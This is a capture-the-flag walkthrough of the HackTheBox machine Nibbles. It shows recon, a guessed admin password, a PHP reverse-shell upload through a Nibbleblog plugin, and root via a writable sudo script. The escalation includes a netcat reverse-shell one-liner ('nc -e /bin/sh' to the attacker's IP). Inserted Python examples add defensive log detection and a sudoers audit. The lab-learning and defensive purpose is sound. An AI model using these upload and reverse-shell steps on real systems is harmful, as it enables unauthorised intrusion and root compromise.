HTB - Nibbles without MetaSploit


An easy box according to HTB's difficulty rating, but with a rather poor user rating. Let's see what it is about!


HTB - Nibbles


Quick recon based on the logo and the box info:

  • Linux box;
  • Misc: web, misconfiguration.


Classic nmap scan:

sudo nmap -T4 -A -p- -oA scan $target_ip
Starting Nmap 7.91 ( ) at 2021-02-17 16:42 CET
Nmap scan report for $target_ip
Host is up (0.023s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
1   23.69 ms
2   24.01 ms $target_ip

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 47.45 seconds

Web scanning

Let's enumerate web folders from the CLI, for a change:

gobuster dir -u http://$target_ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -t 200 -x .php

This won't give us much information; however, by browsing to the website and checking its source, we find a new URL:

Nibbles Check Source

We fire gobuster one more time, with this new URL:

gobuster dir -u http://$target_ip/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -t 200 -x .php

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://$target_ip/nibbleblog/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
2021/02/17 16:54:47 Starting gobuster
/themes (Status: 301)
/feed.php (Status: 200)
/admin (Status: 301)
/admin.php (Status: 200)
/plugins (Status: 301)
/install.php (Status: 200)
/update.php (Status: 200)
/languages (Status: 301)
/index.php (Status: 200)
/content (Status: 301)
/sitemap.php (Status: 200)
2021/02/17 16:55:21 Finished

This reveals juicier info, such as admin.php, install.php, sitemap.php, etc.

Browsing to install.php tells us the site is already installed and offers to upgrade it, which leaks the Nibbleblog version, 4.0.3:

Nibbles Version

By checking the source code on GitHub, we also find a juicy directory, /content/private, which has directory listing enabled:

Nibbles Directory Listing

Checking searchsploit, we find that this version is vulnerable to an Authenticated Arbitrary File Upload. "Authenticated" means we need credentials first.

Looking inside the users.xml file, we can guess that admin is the login.


Now, we could try to brute force the admin area, but it won't be effective since Nibbleblog temporarily blocks our IP after a few failed attempts:

Nibbles WAF

Here, again, I spent way more time than I care to admit. You have to find the password, but can’t “crack” it which means we have to guess it. I tried a lot of stuff… but couldn’t find it, so I cheated… again!

We know the login is admin, and the password is nibbles, like the box's name (which I tried), but I used a capital N.

Nibbles Admin Area

Now that we have our credentials, we can finally start playing with the file-upload vulnerability we found earlier! Since we are trying to solve this without MetaSploit, we need to find a manual way to exploit our target.

Getting initial shell

Let's create a PHP reverse shell (the Pentest Monkey one) and upload it via the Image plugin located at http://$target_ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image, then trigger the shell by browsing to this URL: http://$target_ip/nibbleblog/content/private/plugins/my_image/image.php. The uploaded file is always saved as image.ext, with ext being the "real" extension of what you uploaded, so a .php file ends up as image.php. The underlying weakness is twofold: the plugin keeps the upload's original extension instead of enforcing an image type, and the content/ directory, which only holds uploaded data, is served with PHP execution enabled, so a renamed upload runs as code.

NB: do not forget to start your listener: nc -nlvp 1234.
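From the defender's side, everything above leaves traces in the web server's access log: the scanner user agent and the burst of 404s from the directory brute force, the 200 from install.php on an already-installed blog, and the request for a .php file under content/. The following detector is an added example, not code from the write-up or from Nibbleblog; the log lines it runs on are constructed (Apache combined format, made-up IPs and timestamps), and only the Nibbleblog paths come from the write-up.

```python
"""Added example (not from the original write-up): flag the server-side traces
of the activity described above in Apache access logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# User agents of common content-discovery tools (gobuster's is the one seen on this box).
SCANNER_UA_PREFIXES = ("gobuster/", "dirbuster", "nikto", "ffuf", "sqlmap")
# Installer/updater pages that should not answer 200 once the blog is installed.
INSTALLER_PAGES = {"/nibbleblog/install.php", "/nibbleblog/update.php"}
# content/ holds uploaded data; a .php request under it means an upload is being executed.
UPLOAD_EXEC_RE = re.compile(r"^/nibbleblog/content/.*\.php\d?(\?|$)", re.IGNORECASE)

NOT_FOUND_THRESHOLD = 5                   # this many 404s from one IP ...
NOT_FOUND_WINDOW = timedelta(seconds=60)  # ... inside this window = directory brute force


def parse_line(line):
    """Parse one Apache 'combined' log line; return None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def detect(lines):
    """Return a de-duplicated list of (rule, client_ip, detail) findings."""
    findings, seen = [], set()
    recent_404s = defaultdict(list)   # ip -> timestamps of recent 404 responses
    burst_flagged = set()

    def add(rule, ip, detail):
        key = (rule, ip, detail)
        if key not in seen:
            seen.add(key)
            findings.append(key)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, ua, status = rec["ip"], rec["path"], rec["ua"], rec["status"]

        if ua.lower().startswith(SCANNER_UA_PREFIXES):
            add("scanner_user_agent", ip, ua)
        if path.split("?")[0] in INSTALLER_PAGES and status == 200:
            add("installer_reachable", ip, path)
        if UPLOAD_EXEC_RE.match(path):
            add("php_in_content_dir", ip, path)
        if status == 404:
            window = recent_404s[ip]
            window.append(rec["ts"])
            # drop 404s that fell out of the sliding window (the newest entry always stays)
            while rec["ts"] - window[0] > NOT_FOUND_WINDOW:
                window.pop(0)
            if len(window) >= NOT_FOUND_THRESHOLD and ip not in burst_flagged:
                burst_flagged.add(ip)
                add("not_found_burst", ip,
                    f"{len(window)} 404s within {NOT_FOUND_WINDOW.seconds}s")
    return findings


# Constructed sample log: made-up client IPs, timestamps and guesses; the
# Nibbleblog paths are the ones discussed in the write-up.
SAMPLE_LOG = '''\
10.10.14.5 - - [17/Feb/2021:16:54:47 +0100] "GET /nibbleblog/themes HTTP/1.1" 301 312 "-" "gobuster/3.0.1"
10.10.14.5 - - [17/Feb/2021:16:54:47 +0100] "GET /nibbleblog/abc.php HTTP/1.1" 404 273 "-" "gobuster/3.0.1"
10.10.14.5 - - [17/Feb/2021:16:54:48 +0100] "GET /nibbleblog/abd.php HTTP/1.1" 404 273 "-" "gobuster/3.0.1"
10.10.14.5 - - [17/Feb/2021:16:54:48 +0100] "GET /nibbleblog/abe HTTP/1.1" 404 273 "-" "gobuster/3.0.1"
10.10.14.5 - - [17/Feb/2021:16:54:49 +0100] "GET /nibbleblog/abf HTTP/1.1" 404 273 "-" "gobuster/3.0.1"
10.10.14.5 - - [17/Feb/2021:16:54:49 +0100] "GET /nibbleblog/abg.php HTTP/1.1" 404 273 "-" "gobuster/3.0.1"
10.10.14.5 - - [17/Feb/2021:16:58:02 +0100] "GET /nibbleblog/install.php HTTP/1.1" 200 1543 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/85.0"
10.10.14.5 - - [17/Feb/2021:17:20:11 +0100] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/85.0"
192.168.1.20 - - [17/Feb/2021:17:21:00 +0100] "GET /nibbleblog/content/public/upload/photo.jpg HTTP/1.1" 200 48211 "http://blog.example/" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{rule:20} {ip:15} {detail}")
```

Run it against a real log with `detect(open("/var/log/apache2/access.log").readlines())`. The `php_in_content_dir` rule is the one worth an alert on its own: a single hit is enough, because nothing legitimate in that tree should ever be requested as PHP, and the fix is the same as the detection (deny script execution under content/ in the web server configuration).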

And we are in, unfortunately as nibbler and not root:

Nibbles Initial Shell

Let's still grab the user flag:

Nibbles User Flag

And now… we need to escalate our privileges!


Before we have a chance to elevate our privileges, we should do more internal recon.

We'll upload LSE (linux-smart-enumeration) to check for any entry points for privilege escalation.

We will serve the script with sudo python2 -m SimpleHTTPServer 80, since our target doesn't seem to resolve GitHub's domain, and download it with curl.

Once it is downloaded, make it executable and run it. Something interesting comes up:

Nibbles LSE Sudo

This means we'll be able to run anything as root, as long as it is in /home/nibbler/personal/stuff/. The problem is that the sudoers entry names a path inside the user's own home directory, so the user can create or replace whatever file the entry points at, and NOPASSWD means nothing stands between that file and a root shell.
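The check an administrator would want for this is an audit of sudoers entries for exactly this pattern: a command path that lives somewhere the invoking user controls, plus the usual ALL and wildcard offenders. The script below is an added example, not code from the write-up or from LSE; the sudoers lines it parses are constructed, and `script.sh` is a placeholder name for the file under /home/nibbler/personal/stuff/ (the write-up does not give the real name).

```python
"""Added example (not from the original write-up): audit sudoers user
specifications for commands the invoking user can tamper with."""
import os
import pwd
import re
import stat

# Matches one sudoers user specification:  user host=(runas) TAG: cmd1, cmd2
ENTRY_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)*")   # strips NOPASSWD:, SETENV:, ...
# Locations any local user can typically write to.
USER_CONTROLLED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_entry(line):
    """Return (user, runas, [commands]) or None for comments, Defaults and other lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = ENTRY_RE.match(line)
    if not m:
        return None
    cmds = [TAG_RE.sub("", c.strip()) for c in m.group("cmds").split(",")]
    return m.group("user"), m.group("runas") or "root", [c for c in cmds if c]


def audit_command(user, cmd, check_fs=False):
    """Explain why one sudo command is risky, or return None if it looks fine."""
    path = cmd.split()[0]
    if path == "ALL":
        return "grants every command (ALL)"
    if "*" in cmd:
        return "wildcard lets the caller vary the command line"
    if path.startswith(f"/home/{user}/"):
        return "command lives under the invoking user's own home directory"
    if path.startswith(USER_CONTROLLED_PREFIXES):
        return "command lives in a user-writable location"
    if check_fs and os.path.isdir(os.path.dirname(path)):
        # Optional live check: is the directory holding the command owned by
        # the caller, or group/world writable?  Only meaningful on the audited host.
        st = os.stat(os.path.dirname(path))
        try:
            uid = pwd.getpwnam(user).pw_uid
        except KeyError:          # group entries (%name) or unknown users
            uid = None
        if st.st_uid == uid or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return "directory holding the command is writable by the caller"
    return None


def audit(lines, check_fs=False):
    """Return a list of (user, command, reason) for every risky entry."""
    findings = []
    for line in lines:
        parsed = parse_entry(line)
        if parsed is None:
            continue
        user, _runas, cmds = parsed
        for cmd in cmds:
            reason = audit_command(user, cmd, check_fs)
            if reason:
                findings.append((user, cmd, reason))
    return findings


# Constructed sudoers content; script.sh is a placeholder for the real file name.
SAMPLE_SUDOERS = """\
# Constructed sudoers content for this example
Defaults        env_reset
%sudo   ALL=(ALL:ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/script.sh
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app-*
"""

if __name__ == "__main__":
    for user, cmd, reason in audit(SAMPLE_SUDOERS.splitlines()):
        print(f"{user:8} {cmd:55} {reason}")
```

On a real host, feed it the lines of /etc/sudoers and /etc/sudoers.d/* (read as root) with `check_fs=True`, so that entries pointing outside the obvious prefixes are still caught when the directory turns out to be owned by, or writable for, the caller. The fix for the nibbler entry is to move the script to a root-owned directory such as /usr/local/sbin/ and reference it from there.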

All right! Let's try to run a reverse shell:

cd /home/nibbler
echo "#!/bin/bash" > personal/stuff/
echo "nc -e /bin/sh $attacking_ip 1235" >> personal/stuff/
chmod +x personal/stuff/

Now we run it:

sudo /home/nibbler/personal/stuff/

NB: don't forget to start the listener on your attacking machine.

And that's it, we have root:

Nibbles Root Shell

And we grab the last flag:

Nibbles Root Flag


Let me be blunt. Getting the admin's password sucked, and was no fun at all. Judging from the comments on the forum and the poor rating, I guess I wasn't the only one really frustrated while trying to get initial access. However, once I was in, while it was pretty easy, it was also super fun and I really enjoyed this box!